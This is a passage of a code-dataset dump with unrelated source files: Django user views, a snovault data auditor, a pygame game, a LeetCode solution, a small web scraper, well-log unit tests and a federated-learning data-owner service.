UserLoginForm()\r\n context = {'form': form}\r\n return render(request, 'users/login.html', context)\r\n\r\n\r\ndef register(request):\r\n if request.method == 'POST':\r\n form = UserRegForm(data=request.POST)\r\n if form.is_valid():\r\n form.save()\r\n messages.success(request, 'Вы зарегистрировались!')\r\n return HttpResponseRedirect('/')\r\n else:\r\n form = UserRegForm()\r\n context = {'form': form}\r\n return render(request, 'users/register.html', context)\r\n\r\n\r\ndef profile(request):\r\n if request.method == 'POST':\r\n form = UserProfileForm(instance=request.user, data=request.POST)\r\n if form.is_valid():\r\n form.save()\r\n return 1\r\n else:\r\n print(form.errors)\r\n else:\r\n form = UserProfileForm(instance=request.user)\r\n context = {'title': 'Я каменщик', 'form': form}\r\n return render(request, 'users/profile.html', context)\r\n\r\n\r\ndef logout(request):\r\n auth.logout(request)\r\n return HttpResponseRedirect('/')\r\n\r\n","repo_name":"Asssmodei/Store_on_Django","sub_path":"Store/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25628069446","text":"\"\"\" Cross-object data auditing\n\nSchema validation 
allows for checking values within a single object.\nWe also need to perform higher order checking between linked objects.\n\"\"\"\n\nimport logging\nimport venusian\nfrom past.builtins import basestring\nfrom pyramid.view import view_config\nfrom .calculated import calculated_property\nfrom .elasticsearch.interfaces import ICachedItem\nfrom .interfaces import (\n AUDITOR,\n TYPES,\n)\nfrom .resources import Item\n\nlogger = logging.getLogger(\"__name__\")\nlogger.setLevel(logging.ERROR)\n\n\ndef includeme(config):\n config.include('.calculated')\n config.include('.typeinfo')\n config.scan(__name__)\n config.registry[AUDITOR] = Auditor()\n config.add_directive('add_audit_checker', add_audit_checker)\n config.add_request_method(audit, 'audit')\n\n\n# Same as logging\n_levelNames = {\n 0: 'NOTSET',\n 10: 'DEBUG',\n 20: 'INFO',\n 30: 'INTERNAL_ACTION',\n 40: 'WARNING',\n 50: 'NOT_COMPLIANT',\n 60: 'ERROR',\n 'DEBUG': 10,\n 'ERROR': 60,\n 'INFO': 20,\n 'NOTSET': 0,\n 'WARNING': 40,\n 'NOT_COMPLIANT': 50,\n 'INTERNAL_ACTION': 30,\n}\n\n\nclass AuditFailure(Exception):\n def __init__(self, category, detail=None, level=0, path=None, name=None):\n super(AuditFailure, self)\n self.category = category\n self.detail = detail\n if not isinstance(level, int):\n level = _levelNames[level]\n self.level = level\n self.path = path\n self.name = name\n\n def __json__(self, request=None):\n return {\n 'category': self.category,\n 'detail': self.detail,\n 'level': self.level,\n 'level_name': _levelNames[self.level],\n 'path': self.path,\n 'name': self.name,\n }\n\n\nclass Auditor(object):\n \"\"\" Data audit manager\n \"\"\"\n _order = 0\n\n def __init__(self):\n self.type_checkers = {}\n\n def add_audit_checker(self, checker, item_type, condition=None, frame='embedded'):\n checkers = self.type_checkers.setdefault(item_type, [])\n self._order += 1 # consistent execution ordering\n if isinstance(frame, list):\n frame = tuple(sorted(frame))\n checkers.append((self._order, checker, condition, frame))\n\n def audit(self, request, types, path, **kw):\n if isinstance(types, basestring):\n types = [types]\n checkers = set()\n checkers.update(*(self.type_checkers.get(item_type, ()) for item_type in types))\n errors = []\n system = {\n 'request': request,\n 'path': path,\n 'types': types,\n }\n system.update(kw)\n for order, checker, condition, frame in sorted(checkers):\n if frame is None:\n uri = path\n elif isinstance(frame, basestring):\n uri = '%s@@%s' % (path, frame)\n else:\n uri = '%s@@expand?expand=%s' % (path, '&expand='.join(frame))\n value = request.embed(uri)\n\n if condition is not None:\n try:\n if not condition(value, system):\n continue\n except Exception as e:\n detail = '%s: %r' % (checker.__name__, e)\n failure = AuditFailure(\n 'audit condition error', detail, 'ERROR', path, checker.__name__)\n errors.append(failure.__json__(request))\n logger.warning('audit condition error auditing %s', path, exc_info=True)\n continue\n try:\n try:\n result = checker(value, system)\n except AuditFailure as e:\n e = e.__json__(request)\n if e['path'] is None:\n e['path'] = path\n e['name'] = checker.__name__\n errors.append(e)\n continue\n if result is None:\n continue\n if isinstance(result, AuditFailure):\n result = [result]\n for item in result:\n if isinstance(item, AuditFailure):\n item = item.__json__(request)\n if item['path'] is None:\n item['path'] = path\n item['name'] = checker.__name__\n errors.append(item)\n continue\n raise ValueError(item)\n except Exception as e:\n detail = '%s: %r' % 
(checker.__name__, e)\n failure = AuditFailure(\n 'audit script error', detail, 'ERROR', path, checker.__name__)\n errors.append(failure.__json__(request))\n logger.warning('audit script error auditing %s', path, exc_info=True)\n continue\n return errors\n\n\n# Imperative configuration\ndef add_audit_checker(config, checker, type_, condition=None, frame='embedded'):\n def callback():\n types = config.registry[TYPES]\n ti = types[type_]\n auditor = config.registry[AUDITOR]\n auditor.add_audit_checker(checker, ti.name, condition, frame)\n\n config.action(None, callback)\n\n\n# Declarative configuration\ndef audit_checker(type_, condition=None, frame='embedded'):\n \"\"\" Register an audit checker\n \"\"\"\n\n def decorate(checker):\n def callback(scanner, factory_name, factory):\n scanner.config.add_audit_checker(\n checker, type_, condition, frame)\n\n venusian.attach(checker, callback, category=AUDITOR)\n return checker\n\n return decorate\n\n\ndef audit(request, types=None, path=None, context=None, **kw):\n auditor = request.registry[AUDITOR]\n if path is None:\n path = request.path\n if context is None:\n context = request.context\n if types is None:\n types = [context.type_info.name] + context.type_info.base_types\n return auditor.audit(\n request=request, types=types, path=path, root=request.root, context=context,\n registry=request.registry, **kw)\n\n\n# Views\ndef traversed_path_ids(request, obj, path):\n if isinstance(path, basestring):\n path = path.split('.')\n if not path:\n yield obj if isinstance(obj, basestring) else obj['@id']\n return\n name = path[0]\n remaining = path[1:]\n value = obj.get(name, None)\n if value is None:\n return\n if not isinstance(value, list):\n value = [value]\n for member in value:\n if remaining and isinstance(member, basestring):\n member = request.embed(member, '@@object')\n for item_uri in traversed_path_ids(request, member, remaining):\n yield item_uri\n\n\ndef inherit_audits(request, embedded, embedded_paths):\n audit_paths = {embedded['@id']}\n for embedded_path in embedded_paths:\n audit_paths.update(traversed_path_ids(request, embedded, embedded_path))\n\n audits = {}\n for audit_path in audit_paths:\n result = request.embed(audit_path, '@@audit-self')\n for audit in result['audit']:\n if audit['level_name'] in audits:\n audits[audit['level_name']].append(audit)\n else:\n audits[audit['level_name']] = [audit]\n return audits\n\n\n@view_config(context=Item, permission='audit', request_method='GET',\n name='audit-self')\ndef item_view_audit_self(context, request):\n path = request.resource_path(context)\n types = [context.type_info.name] + context.type_info.base_types\n return {\n '@id': path,\n 'audit': request.audit(types=types, path=path),\n }\n\n\n@view_config(context=Item, permission='audit', request_method='GET',\n name='audit')\ndef item_view_audit(context, request):\n path = request.resource_path(context)\n properties = request.embed(path, '@@object')\n inherit = context.audit_inherit\n embedded_paths = context.embedded_paths()\n if embedded_paths and '*' in context.audit_inherit:\n inherit = embedded_paths\n else:\n inherit = context.audit_inherit or []\n audit = inherit_audits(request, properties, inherit)\n return {\n '@id': path,\n 'audit': audit,\n }\n\n\ndef audit_condition(context, request):\n # Audits must be explicitly requested if they\n # are not available in precached form from elasticsearch\n force_audit = request.params.get('audit', False)\n if not ICachedItem.providedBy(context) and not force_audit:\n return False\n # 
Don't embed audits unless user has permission to see them\n if not request.has_permission('audit'):\n return False\n return True\n\n\n@calculated_property(context=Item, category='page', name='audit',\n condition=audit_condition)\ndef audit_property(context, request):\n path = request.resource_path(context)\n return request.embed(path, '@@audit')['audit']\n","repo_name":"ENCODE-DCC/snovault","sub_path":"src/snovault/auditor.py","file_name":"auditor.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"38569177934","text":"import pygame\r\nfrom classes import person, projectile, enemy\r\npygame.init()\r\n\r\n#Initializing Game\r\nwinSize = width, height = 800, 500\r\nWIN = pygame.display.set_mode(winSize)\r\npygame.display.set_caption(\"808 BLASTER >:)\")\r\nclock = pygame.time.Clock()\r\nfps = 30\r\ndifficulty = 15\r\nscore = 0\r\nlives = 3\r\n\r\n#Assets\r\n #Images\r\nbg = pygame.image.load('808Blaster/Images/background.jpg')\r\n\r\nwalkR = [pygame.image.load('808Blaster/Images/runcycle/F2.png'), pygame.image.load('808Blaster/Images/runcycle/F1.png')]\r\nwalkL = [pygame.transform.flip(walkR[0], True, False), pygame.transform.flip(walkR[1], True, False)]\r\ncharR = pygame.image.load('808Blaster/Images/character.png') # 100 X 140\r\ncharL = pygame.transform.flip(charR, True, False)\r\ncrouchR = pygame.image.load('808Blaster/Images/crouch.png') # 100 x 75\r\ncrouchL = pygame.transform.flip(crouchR, True, False)\r\n\r\nprojR = pygame.image.load('808Blaster/Images/808.png') # 70 x 50\r\nprojR = pygame.transform.scale(projR, (140, 100))\r\nprojL = pygame.transform.flip(projR, True, False)\r\n\r\ndoomHead = pygame.image.load('808Blaster/Images/doom.png') # 50 X 75\r\n\r\n #Sounds\r\nsanteria = pygame.mixer.Sound('808Blaster/Sounds/Santeria.wav')\r\n\r\n #Fonts\r\nghoust = pygame.font.Font('808Blaster/Font/Ghoust.otf', 32)\r\nzigzag = pygame.font.Font('808Blaster/Font/ZigZag.otf', 64)\r\n\r\n#Initializing user\r\nuser = person(50,height - 140,100,140,santeria)\r\n\r\n\r\n#Drawing screen helper function\r\ndef redrawGameWindow():\r\n WIN.blit(bg, (0,0))\r\n global user, score\r\n\r\n pygame.draw.rect(WIN, (0,0,0), (0,0, 150, 80), 0)\r\n scoreText = ghoust.render('Score: ' + str(score), 1, (255,255,255))\r\n livesText = ghoust.render('Lives: ' + str(lives), 1, (255,255,255))\r\n WIN.blit(scoreText, (5,5))\r\n WIN.blit(livesText, (5,40))\r\n\r\n user.draw(WIN, charR, charL, crouchR, crouchL, walkR, walkL)\r\n #pygame.draw.rect(WIN, (255,0,0), user.hitbox, 1)\r\n for doom in dooms:\r\n doom.draw(WIN, doomHead)\r\n #pygame.draw.rect(WIN, (255,0,0), doom.hitbox, 1)\r\n for shot in shots:\r\n shot.draw(WIN, projR, projL)\r\n #pygame.draw.rect(WIN, (255,0,0), shot.hitbox, 1)\r\n pygame.display.update()\r\n\r\ndef drawGameOverWindow():\r\n WIN.fill((0,0,0))\r\n gameOverText = zigzag.render(\"GAME OVER!\", 1, (255,255,255))\r\n scoreText = ghoust.render(\"You scored \" + str(score), 1, (255,255,255))\r\n WIN.blit(gameOverText, (230,200))\r\n WIN.blit(scoreText, (310,300))\r\n pygame.display.update()\r\n\r\n\r\n#Handling keys helper function\r\ndef handleKeyPress(keys):\r\n \r\n #walking\r\n if keys[pygame.K_a]:\r\n user.left = True\r\n user.right = False\r\n user.standing = False \r\n user.walkCount -= 1\r\n pos = user.x - user.vel\r\n user.x = pos if pos > 0 else 0\r\n user.updateHitbox()\r\n elif keys[pygame.K_d]:\r\n user.right = True\r\n user.left = False\r\n user.standing = False\r\n user.walkCount 
+= 1\r\n pos = user.x + user.vel\r\n user.x = pos if pos < (width - user.w) else (width - user.w)\r\n user.updateHitbox()\r\n else:\r\n user.walkCount = 0\r\n user.standing = True\r\n \r\n #crouching\r\n if keys[pygame.K_s]:\r\n if not user.isCrouched:\r\n user.isCrouched = True\r\n user.y += 65\r\n user.updateHitbox()\r\n else:\r\n if user.isCrouched:\r\n user.isCrouched = False\r\n user.y -= 65\r\n user.updateHitbox()\r\n\r\n #shooting\r\n if not user.isShoot:\r\n if keys[pygame.K_w] and user.hasEquipped:\r\n face = 1 if user.right else -1\r\n x = round(user.x + user.w // 2)\r\n x = x if face == 1 else x - 140\r\n y = user.y + 20\r\n user.equipped.play()\r\n shots.append(projectile(x, y, face)) \r\n user.isShoot = True\r\n else:\r\n user.shootCount += 1\r\n if user.shootCount > 10:\r\n user.shootCount = 0\r\n user.isShoot = False\r\n\r\n #jumping\r\n if not user.isJump:\r\n if keys[pygame.K_SPACE]:\r\n user.isJump = True\r\n else:\r\n if user.jumpCount >= -user.jL:\r\n userH = 75 if user.isCrouched else 140\r\n temp = user.y\r\n temp -= ((user.jumpCount ** 2) / 2) if (user.jumpCount > 1) else -((user.jumpCount ** 2) / 2)\r\n user.y = temp if temp < (height - userH) else (height - userH)\r\n user.jumpCount -= 1\r\n user.updateHitbox()\r\n else:\r\n user.isJump = False\r\n user.jumpCount = user.jL\r\n\r\n\r\nshots = []\r\ndooms = []\r\ndoomCount = 0\r\nhitTimer = 0\r\ngameOver = False\r\n#Main Loop\r\nrun = True\r\nwhile run:\r\n clock.tick(fps)\r\n # Exits game when user does\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n if not gameOver:\r\n doomCount += 1\r\n if doomCount % difficulty == 0:\r\n dooms.append(enemy())\r\n\r\n if user.isHit:\r\n hitTimer += 1\r\n if hitTimer >= 30:\r\n hitTimer = 0\r\n user.isHit = False\r\n\r\n for shot in shots:\r\n if shot.x < (width - shot.w) and shot.x > 0:\r\n shot.x += shot.vel\r\n shot.updateHitbox()\r\n else:\r\n shots.pop(shots.index(shot))\r\n for doom in dooms:\r\n \r\n if (user.hitbox[0] < doom.hitbox[0] + doom.hitbox[2] and\r\n user.hitbox[0] + user.hitbox[2] > doom.hitbox[0] and\r\n user.hitbox[1] < doom.hitbox[1] + doom.hitbox[3] and\r\n user.hitbox[1] + user.hitbox[3] > doom.hitbox[1]\r\n and not user.isHit\r\n and doom.hitbox[1] < 500):\r\n print(user.hitbox)\r\n print(doom.hitbox)\r\n lives -= 1\r\n if lives <= 0:\r\n gameOver = True\r\n user.hit()\r\n dooms.pop(dooms.index(doom))\r\n continue\r\n \r\n for shot in shots:\r\n if (shot.hitbox[0] < doom.hitbox[0] + doom.hitbox[2] and\r\n shot.hitbox[0] + shot.hitbox[2] > doom.hitbox[0] and\r\n shot.hitbox[1] < doom.hitbox[1] + doom.hitbox[3] and\r\n shot.hitbox[1] + shot.hitbox[3] > doom.hitbox[1] and\r\n not doom.isHit):\r\n score += 1\r\n doom.hit()\r\n shots.pop(shots.index(shot))\r\n\r\n if doom.isHit and (doom.y < 500):\r\n doom.y -= doom.vel\r\n doom.updateHitbox()\r\n elif (doom.x > 0):\r\n doom.x += doom.vel\r\n doom.updateHitbox()\r\n else:\r\n dooms.pop(dooms.index(doom))\r\n \r\n keys = pygame.key.get_pressed()\r\n handleKeyPress(keys)\r\n redrawGameWindow()\r\n \r\n else:\r\n \r\n drawGameOverWindow()\r\n\r\n\r\npygame.quit()\r\n","repo_name":"zdzirin/808Blaster","sub_path":"808Blaster.py","file_name":"808Blaster.py","file_ext":"py","file_size_in_byte":6963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38726671961","text":"'''\r\n###### * User Profile : Keval_78 \r\nLinkedIn: https://www.linkedin.com/in/kevalpadsala78/\r\nGithub: https://github.com/Keval78\r\nLeetcode: 
https://leetcode.com/Keval_78/\r\n'''\r\n\r\nfrom typing import List\r\n\r\n\r\ndef main():\r\n class Solution:\r\n def isBoomerang(self, points: List[List[int]]) -> bool:\r\n x1, y1, x2, y2, x3, y3 = points[0] + points[1] + points[2]\r\n area = abs(x1*(y2-y3) + x2*(y3-y1) + x3*(y1-y2))/2\r\n return area != 0\r\n\r\n Solution().isBoomerang(points=[[1, 1], [2, 3], [3, 2]])\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/1037 Valid Boomerang.py","file_name":"1037 Valid Boomerang.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27686718214","text":"from bs4 import BeautifulSoup\nfrom requests_html import HTMLSession\n\ndef nemligList():\n\n URL = 'https://www.nemlig.com/?search=pepsi'\n\n\n \n session = HTMLSession()\n r = session.get(URL)\n\n r.html.render(sleep=1, keep_page=True)\n\n soup = BeautifulSoup(r.html.html,'lxml')\n\n\n\n print(soup.find_all('productlist-item__name'))\n\nnemligList()","repo_name":"Stobes/python_4sem","sub_path":"Python_exam/Modules/nemlig_scraping.py","file_name":"nemlig_scraping.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"71559895789","text":"import os\nimport string\nimport unittest\nfrom datetime import datetime, timedelta\nfrom random import randint, random, choice\n\nimport numpy as np\n\nfrom components.database.RedisStorage import RedisStorage\nfrom components.domain.Log import BasicLog\nfrom components.domain.Well import Well\nfrom components.domain.WellDataset import WellDataset\nfrom components.importexport import las\nfrom components.importexport.markers_importexport import import_markers_csv\nfrom settings import BASE_DIR\n\n\nclass TestLog(unittest.TestCase):\n def setUp(self) -> None:\n _s = RedisStorage()\n _s.flush_db()\n self.well = Well(\"test\", new=True)\n self.dataset = WellDataset(self.well, \"test\", new=True)\n self.path_to_test_data = os.path.join(BASE_DIR, 'components', 'domain', 'tests', 'test_data')\n\n def test_create_two_logs(self):\n\n data = {\"GR\": np.array(((10.0, 1.0), (20.0, 2.0))),\n \"PS\": np.array(((10.0, 3.0), (20.0, 4.0)))}\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"},\n \"PS\": {\"units\": \"mV\", \"code\": \"\", \"description\": \"PS\"}}\n log1 = BasicLog(self.dataset.id, log_id=\"GR\")\n log1.values = data[\"GR\"]\n log1.meta = meta[\"GR\"]\n log1.save()\n\n log2 = BasicLog(self.dataset.id, log_id=\"PS\")\n log2.values = data[\"PS\"]\n log2.meta = meta[\"PS\"]\n log2.save()\n\n for log_name in data.keys():\n log = BasicLog(self.dataset.id, log_name)\n self.assertTrue(np.isclose(log.values, data[log_name], equal_nan=True).all())\n\n def test_log_meta_parsed_to_properties(self):\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"}, }\n\n log1 = BasicLog(self.dataset.id, log_id=\"GR\")\n log1.meta = meta[\"GR\"]\n log1.meta.one_more_field = \"test_value\"\n log1.save()\n\n self.assertEqual('GR', log1.meta.name)\n self.assertEqual([], log1.meta.tags)\n self.assertEqual('test_value', log1.meta.one_more_field)\n\n def test_name_works_correctly(self):\n log_id = 'GRTRTT'\n gr = BasicLog(log_id=log_id)\n self.assertEqual(log_id, gr.name)\n gr.meta.name = 'GR'\n self.assertEqual('GR', gr.name)\n self.assertFalse(gr.exists())\n gr.meta.dataset_id = self.dataset.id\n 
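# The log is only persisted once it has a dataset_id and save() is called.\n 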
gr.save()\n self.assertTrue(gr.exists())\n\n gr1 = BasicLog(dataset_id=self.dataset.id, log_id=log_id)\n self.assertTrue(gr1.exists())\n self.assertEqual(\"GR\", gr1.name)\n\n def test_log_get_data(self):\n f = 'small_file.las'\n ref_depth = 200.14440000\n wellname = '15_9-13'\n dataset_name = 'one'\n well = Well(wellname, new=True)\n dataset = WellDataset(well, dataset_name, new=True)\n\n dataset.meta = las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n true_answer = {'DRHO': np.nan,\n 'NPHI': np.nan,\n 'BS': 17.5,\n 'DTS': np.nan,\n 'x_loc': 444904.03125}\n\n for log_name in true_answer.keys():\n log = BasicLog(dataset.id, log_name)\n log.crop(depth=ref_depth, inplace=True)\n value = log[0, 1] # [row, column]\n self.assertTrue(np.isclose(value, true_answer[log_name], equal_nan=True))\n\n def test_add_many_logs(self):\n f = 'small_file.las'\n log_count = 5\n LOG_TYPES = (float, str, int, bool, datetime,)\n\n wellname = 'thousand_logs'\n datasetname = 'this_dataset'\n well = Well(wellname, new=True)\n dataset = WellDataset(well, datasetname, new=True)\n\n # load some real data\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n # create logs in the dataset\n new_logs = {f\"LOG_{i}\": log_type for i, log_type in enumerate(LOG_TYPES)}\n new_logs_meta = {f\"LOG_{i}\": {\"units\": \"some_units\", \"code\": i, \"description\": f\"Dummy log {i}\"} for i in range(0, log_count)}\n # get depths\n existing_depths = BasicLog(dataset.id, \"GR\").values[:, 0]\n\n # add data to the log_names\n def dummy_data(dtype): # returns scalar\n generators = {\n float: 400 * random() - 200,\n str: ''.join(choice(string.ascii_letters) for _ in range(64)),\n int: randint(-1000, 1000),\n datetime: datetime.strftime(datetime.now() + random() * timedelta(days=1), \"%Y-%m-%d %H:%M:%S.%f%z\"),\n bool: 1 == randint(0, 1)\n }\n return generators[dtype]\n\n def dummy_log(depths, dtype):\n return np.array([(depth, dummy_data(dtype)) for depth in depths])\n\n for new_log, log_type in new_logs.items():\n log = BasicLog(dataset_id=dataset.id, log_id=new_log)\n log.values = dummy_log(existing_depths, log_type)\n log.meta = new_logs_meta[new_log]\n log.save()\n\n self.assertEqual(len(dataset.log_list), 21 + log_count)\n d = BasicLog(dataset.id, 'LOG_1')\n self.assertEqual(84, len(d), 'Log length must be 84')\n\n def test_logs_list(self):\n f = 'small_file.las'\n wellname = f[:-4]\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n log_list = dataset.get_log_list()\n self.assertIn(\"GR\", log_list)\n\n def test_log_history(self):\n f = 'small_file.las'\n wellname = \"log_history_test\"\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n log = BasicLog(dataset.id, \"GR\")\n log.meta.append_history(f'Loaded from {f}')\n self.assertEqual(f'Loaded from {f}', log.meta.history[0][1])\n\n def test_append_log_meta(self):\n well = Well('well2', new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n meta = {\"GR\": {\"units\": \"gAPI\", \"code\": \"\", \"description\": \"GR\"},\n \"PS\": {\"units\": \"mV\", \"code\": \"\", \"description\": \"PS\"}}\n\n for log_name, new_meta in meta.items():\n log = BasicLog(dataset.id, log_name)\n log.meta 
= new_meta\n log.save()\n\n log = BasicLog(dataset.id, \"GR\")\n log.meta.max_depth = 100\n log.save()\n\n self.assertEqual(log.meta.max_depth, 100)\n\n def test_unit_conversion_works_correctly(self):\n well = Well('unit_conversion')\n dataset = WellDataset(well, \"test\")\n welllog = BasicLog(dataset.id, \"log\")\n welllog.name = \"log\"\n welllog.meta.units = \"cm\"\n welllog.values = np.array([(10.0, 10), (20.0, 20)])\n\n vals_in_m = welllog.convert_units('km')\n self.assertListEqual([10 ** -4, 2 * 10 ** -4], list(vals_in_m[:, 1]))\n\n welllog.meta.units = \"kg\"\n vals_in_m = welllog.convert_units('g')\n self.assertListEqual([10000, 20000], list(vals_in_m[:, 1]))\n\n def test_adding_removing_tags(self):\n well = Well('tags', new=True)\n dataset = WellDataset(well, \"test\", new=True)\n welllog = BasicLog(dataset.id, \"log\")\n # welllog.save()\n # no tags in the log - empty list\n self.assertEqual(list(), welllog.meta.tags)\n self.assertEqual(list, type(welllog.meta.tags))\n # add one tag - and check it is there\n welllog.meta.add_tags(\"tag1\", )\n welllog.save()\n self.assertCountEqual({\"tag1\"}, welllog.meta.tags)\n self.assertEqual(list, type(welllog.meta.tags))\n # do not add duplicated tag\n welllog.meta.add_tags(\"tag1\")\n self.assertCountEqual([\"tag1\"], welllog.meta.tags)\n # add multiple new logs\n welllog.meta.add_tags(\"tag1\", \"tag2\", \"tag3\")\n self.assertCountEqual([\"tag1\", \"tag2\", \"tag3\"], welllog.meta.tags)\n # delete one tag\n welllog.meta.delete_tags(\"tag1\")\n welllog.save()\n self.assertCountEqual([\"tag2\", \"tag3\"], welllog.meta.tags)\n # check cannot delete missing tag\n with self.assertRaises(ValueError):\n welllog.meta.delete_tags(\"tag1\")\n # check delete multiple tags\n welllog.meta.delete_tags(\"tag2\", \"tag3\")\n welllog.save()\n self.assertEqual([], welllog.meta.tags)\n dataset.delete_log(welllog.name)\n\n def test_hashing_works_correctly(self):\n f = 'small_file.las'\n wellname = f[:-4]\n well = Well(wellname, new=True)\n dataset = WellDataset(well, \"one\", new=True)\n\n las.import_to_db(filename=os.path.join(self.path_to_test_data, f),\n well=well,\n well_dataset=dataset)\n\n log = BasicLog(dataset.id, \"GR\")\n log.update_hashes()\n log.save()\n\n true_values = {\n \"data_hash\": \"43b6e247100f1688023b4e915ad852d0\",\n \"meta_hash\": \"75e2790b7bd95272c1b34efb0270ba0a\",\n \"full_hash\": \"43b6e247100f1688023b4e915ad852d075e2790b7bd95272c1b34efb0270ba0a\"\n }\n test_log = BasicLog(dataset.id, \"GR\")\n self.assertEqual(true_values['data_hash'], test_log.data_hash)\n self.assertEqual(true_values['meta_hash'], test_log.meta_hash)\n self.assertEqual(true_values['full_hash'], test_log.full_hash)\n\n\nclass TestMarkersLog(unittest.TestCase):\n def setUp(self) -> None:\n pass\n # _s = RedisStorage()\n # _s.flush_db()\n self.path_to_test_data = os.path.join(BASE_DIR, 'test_data')\n # for filename in os.listdir(os.path.join(self.path_to_test_data, 'ProjectData')):\n # if not filename.endswith('.las'):\n # continue\n # import_to_db(filename=os.path.join(self.path_to_test_data, 'ProjectData', filename))\n\n def test_markers_with_gaps_loading_from_csv(self):\n with open(os.path.join(self.path_to_test_data, 'Markers', 'FieldData_StratigraphyWithoutGaps.csv')) as raw_data:\n import_markers_csv(raw_data=raw_data, 
missing_value='-9999')\n","repo_name":"iGeophysix/gamma","sub_path":"components/domain/tests/test_log.py","file_name":"test_log.py","file_ext":"py","file_size_in_byte":10434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37509137553","text":"import logging\n\nfrom commons.data.data_loader import DataLoader\nfrom commons.decorators.decorators import data_owner_computation\nfrom commons.model.model_service import ModelFactory\nfrom commons.utils.singleton import Singleton\nfrom commons.operations_utils.functions import deserialize, serialize\nfrom data_owner.domain.data_owner import DataOwner\nfrom data_owner.models.model import Model, TrainingStatus\nfrom data_owner.services.datasets_service import DatasetsService\nfrom data_owner.services.federated_aggregator_connector import FederatedAggregatorConnector\n\n\nclass DataOwnerService(metaclass=Singleton):\n\n def __init__(self):\n self.client_id = None\n self.trainings = {}\n self.config = None\n self.data_loader = None\n self.federated_aggregator_connector = None\n self.encryption_service = None\n\n def init(self, config, encryption_service=None):\n \"\"\"\n :param config:\n :param data_loader:\n :param encryption_service:\n \"\"\"\n self.config = config\n self.encryption_service = encryption_service\n self.federated_aggregator_connector = FederatedAggregatorConnector(self.config)\n\n def update_stored_model(self, model_orm, model, public_key):\n model_orm.set_weights(serialize(model.weights, self.encryption_service, public_key))\n model_orm.model = model\n model_orm.update()\n\n def get_stored_model(self, model_orm, public_key):\n model_orm.set_weights(deserialize(model_orm.get_weights(), self.encryption_service, public_key))\n\n @data_owner_computation()\n def process(self, model_id, weights, public_key):\n \"\"\"\n Process to run model\n :param model_type:\n :param weights:\n :return:\n \"\"\"\n\n logging.info(\"Initializing local model\")\n model_orm = Model.get(model_id)\n model_orm.set_weights(weights)\n model, gradient = DataOwner().calculate_gradient(model_orm.model)\n self.update_stored_model(model_orm, model, public_key)\n return gradient\n\n def register(self, user):\n \"\"\"\n Register client into federated server\n :return:\n \"\"\"\n self.client_id = user.delta_id\n result = self.federated_aggregator_connector.register(user)\n\n logging.info(\"DataOwner registration status:\" + str(result))\n\n def get_id(self):\n return self.client_id\n\n @data_owner_computation()\n def step(self, model_id, step_data, public_key):\n \"\"\"\n :param model_id:\n :param step_data:\n :param public_key:\n :return:\n \"\"\"\n model_orm = Model.get(model_id)\n self.get_stored_model(model_orm, public_key)\n model = DataOwner().step(model_orm.model, step_data, float(self.config['ETA']))\n return model.weights\n\n @data_owner_computation()\n def model_quality_metrics(self, model_id, weights, model_type, public_key):\n \"\"\"\n Method used only by validator role. It doesn't use the model built from the data. 
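(Added illustrative aside: a minimal numpy sketch of the check described here, scoring the supplied weights on a local hold-out set. The helper below is hypothetical -- it assumes a plain linear model -- and is not this project's API.)\n\n >>> import numpy as np\n >>> def local_mse(weights, X_test, y_test):\n ...     y_hat = X_test @ np.asarray(weights)\n ...     return float(np.mean((y_hat - np.asarray(y_test)) ** 2))\n\n A validator computes such a score against the dataset linked to the model and reports it back through update_mse().\n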
It gets the model from\n the federated trainer and use the local data to calculate quality metrics\n :return: the model quality (currently measured with the MSE)\n \"\"\"\n data_owner = DataOwner()\n logging.info(\"Getting metrics, data owner: {}\".format(self.client_id))\n model_orm = Model.get(model_id)\n X_test, y_test = model_orm.get_dataset()\n model_orm.set_weights(weights)\n diffs = data_owner.model_quality_metrics(model_orm.model, X_test, y_test)\n return diffs\n\n def update_mse(self, model_id, mse, role):\n \"\"\"\n Method used only by validator role. It doesn't use the model built from the data. It gets the model from\n the federated trainer and use the local data to calculate quality metrics\n :return: the model quality (currently measured with the MSE)\n \"\"\"\n logging.info(\"Getting metrics, data owner: {}\".format(self.client_id))\n model_orm = Model.get(model_id)\n model_orm.add_mse(mse)\n if model_orm.initial_mse == 0.0:\n model_orm.initial_mse = mse\n model_orm.status = TrainingStatus.IN_PROGRESS.name\n model_orm.improvement = max([(model_orm.initial_mse - mse) / model_orm.initial_mse, 0])\n model_orm.iterations += 1\n model_orm.role = role\n model_orm.update()\n logging.info(\"Calculated mse: {}\".format(mse))\n\n def link_model_to_dataset(self, model_id):\n has_dataset = False\n model = Model.get(model_id)\n dataset = DatasetsService().get_dataset_for_training(model.requirements)\n if not dataset:\n return model_id, self.get_id(), has_dataset\n model.link_to_dataset(dataset)\n model.update()\n self.federated_aggregator_connector.accept_model_training(self.get_id(), model_id)\n return model_id, self.get_id(), not has_dataset\n\n def model_is_linked(self, model_id):\n return Model.get(model_id).status != 